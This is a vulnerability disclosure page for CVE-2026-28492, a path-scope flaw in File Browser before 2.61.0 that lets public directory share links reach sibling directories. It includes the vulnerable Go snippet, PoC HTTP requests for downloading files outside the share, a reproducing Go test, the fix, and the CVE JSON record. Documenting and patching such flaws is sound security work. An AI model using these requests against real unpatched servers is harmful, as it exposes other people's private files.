File Browser provides a file managing interface within a specified directory and it can be used to upload, delete, preview, rename and edit files. Prior to version 2.61.0, when a user creates a public share link for a directory, the withHashFile middleware in http/public.go uses filepath.Dir(link.Path) to compute the BasePathFs root. This sets the filesystem root to the parent directory instead of the shared directory itself, allowing anyone with the share link to browse and download files from all sibling directories. This issue has been patched in version 2.61.0.
PUBLISHED5.2CWE-200
File Browser: Path Traversal in Public Share Links Exposes Files Outside Shared Directory
Problem type
Affected products
filebrowser
filebrowser
< 2.61.0 - AFFECTED
References
https://github.com/filebrowser/filebrowser/security/advisories/GHSA-mr74-928f-rw69
https://github.com/filebrowser/filebrowser/security/advisories/GHSA-mr74-928f-rw69
https://github.com/filebrowser/filebrowser/commit/31194fb57a5b92e7155219d7ec7273028fcb2e83
https://github.com/filebrowser/filebrowser/commit/31194fb57a5b92e7155219d7ec7273028fcb2e83
https://github.com/filebrowser/filebrowser/releases/tag/v2.61.0
https://github.com/filebrowser/filebrowser/releases/tag/v2.61.0
GitHub Security Advisories
GHSA-mr74-928f-rw69
FileBrowser has Path Traversal in Public Share Links that Exposes Files Outside Shared Directory
https://github.com/advisories/GHSA-mr74-928f-rw69Summary
When a user creates a public share link for a directory, the withHashFile middleware in http/public.go (line 59) uses filepath.Dir(link.Path) to compute the BasePathFs root. This sets the filesystem root to the parent directory instead of the shared directory itself, allowing anyone with the share link to browse and download files from all sibling directories.
Details
In http/public.go lines 52-64, the withHashFile function handles public share link requests:
basePath := link.Path // e.g. "/documents/shared"
filePath := ""
if file.IsDir {
basePath = filepath.Dir(basePath) // BUG: becomes "/documents" (parent!)
filePath = ifPath
}
d.user.Fs = afero.NewBasePathFs(d.user.Fs, basePath)
When a directory at /documents/shared is shared, filepath.Dir("/documents/shared") evaluates to "/documents". The BasePathFs is then rooted at the parent directory /documents/, giving the share link access to everything under /documents/ - not just the intended /documents/shared/.
This affects both publicShareHandler (directory listing via /api/public/share/{hash}) and publicDlHandler (file download via /api/public/dl/{hash}/path).
PoC
- Set up filebrowser with a user whose scope contains:
/documents/shared/public-file.txt(intended to be shared)
/documents/secrets/passwords.txt(NOT intended to be shared)
/documents/private/financial.csv(NOT intended to be shared)
- Create a public share link for the directory
/documents/shared(via POST/api/share/documents/shared) - Access the share link:
GET /api/public/share/{hash} - Expected: Lists only contents of
/documents/shared/
- Expected: Lists only contents of
- Actual: Lists contents of
/documents/(parent), revealingsecrets/,private/, andshared/directories
- Actual: Lists contents of
- Download sibling files:
GET /api/public/dl/{hash}/secrets/passwords.txt - Expected: 404 or 403 (file outside share scope)
- Actual: 200 with file contents (sibling file downloaded successfully)
Standalone Go test reproducing the exact vulnerable code path with afero.NewBasePathFs:
func TestShareScopeEscape(t *testing.T) {
baseFs := afero.NewMemMapFs()
afero.WriteFile(baseFs, "/documents/shared/public.txt", []byte("public"), 0644)
afero.WriteFile(baseFs, "/documents/secrets/passwords.txt", []byte("admin:hunter2"), 0644)
linkPath := "/documents/shared"
basePath := filepath.Dir(linkPath) // BUG: "/documents"
scopedFs := afero.NewBasePathFs(baseFs, basePath)
// Sibling file is accessible through the share:
f, err := scopedFs.Open("/secrets/passwords.txt")
// err is nil - file accessible! Content: "admin:hunter2"
}
This test passes, confirming the vulnerability.
Impact
Unauthenticated information disclosure (CWE-200, CWE-706). Anyone with a public share link for a directory can:
- Browse all sibling directories and files of the shared directory
- Download any file within the parent directory scope
- This works without authentication (public shares) or after providing the share password (password-protected shares) All filebrowser v2.x installations that use directory sharing are affected.
Recommended Fix
Remove the filepath.Dir() call and use link.Path directly as the BasePathFs root:
if file.IsDir {
// Don't change basePath - keep it as link.Path
filePath = ifPath
}
d.user.Fs = afero.NewBasePathFs(d.user.Fs, basePath)
Affected commit: e3d00d591b567a8bfe3b02e42ba586859002c77d (latest)
File: http/public.go, line 59
github.com
https://github.com/filebrowser/filebrowser/security/advisories/GHSA-mr74-928f-rw69
github.com
https://github.com/filebrowser/filebrowser/commit/31194fb57a5b92e7155219d7ec7273028fcb2e83
github.com
https://github.com/filebrowser/filebrowser/releases/tag/v2.61.0
nvd.nist.gov
https://nvd.nist.gov/vuln/detail/CVE-2026-28492
github.com
https://github.com/advisories/GHSA-mr74-928f-rw69
JSON source
https://cveawg.mitre.org/api/cve/CVE-2026-28492Click to expand
{
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"cveMetadata": {
"cveId": "CVE-2026-28492",
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"dateUpdated": "2026-03-05T21:06:21.185Z",
"dateReserved": "2026-02-27T20:57:47.707Z",
"datePublished": "2026-03-05T21:06:21.185Z",
"state": "PUBLISHED"
},
"containers": {
"cna": {
"providerMetadata": {
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M",
"dateUpdated": "2026-03-05T21:06:21.185Z"
},
"title": "File Browser: Path Traversal in Public Share Links Exposes Files Outside Shared Directory",
"descriptions": [
{
"lang": "en",
"value": "File Browser provides a file managing interface within a specified directory and it can be used to upload, delete, preview, rename and edit files. Prior to version 2.61.0, when a user creates a public share link for a directory, the withHashFile middleware in http/public.go uses filepath.Dir(link.Path) to compute the BasePathFs root. This sets the filesystem root to the parent directory instead of the shared directory itself, allowing anyone with the share link to browse and download files from all sibling directories. This issue has been patched in version 2.61.0."
}
],
"affected": [
{
"vendor": "filebrowser",
"product": "filebrowser",
"versions": [
{
"version": "< 2.61.0",
"status": "affected"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"lang": "en",
"description": "CWE-200: Exposure of Sensitive Information to an Unauthorized Actor",
"cweId": "CWE-200",
"type": "CWE"
}
]
}
],
"references": [
{
"url": "https://github.com/filebrowser/filebrowser/security/advisories/GHSA-mr74-928f-rw69",
"name": "https://github.com/filebrowser/filebrowser/security/advisories/GHSA-mr74-928f-rw69",
"tags": [
"x_refsource_CONFIRM"
]
},
{
"url": "https://github.com/filebrowser/filebrowser/commit/31194fb57a5b92e7155219d7ec7273028fcb2e83",
"name": "https://github.com/filebrowser/filebrowser/commit/31194fb57a5b92e7155219d7ec7273028fcb2e83",
"tags": [
"x_refsource_MISC"
]
},
{
"url": "https://github.com/filebrowser/filebrowser/releases/tag/v2.61.0",
"name": "https://github.com/filebrowser/filebrowser/releases/tag/v2.61.0",
"tags": [
"x_refsource_MISC"
]
}
],
"metrics": [
{}
]
}
}
}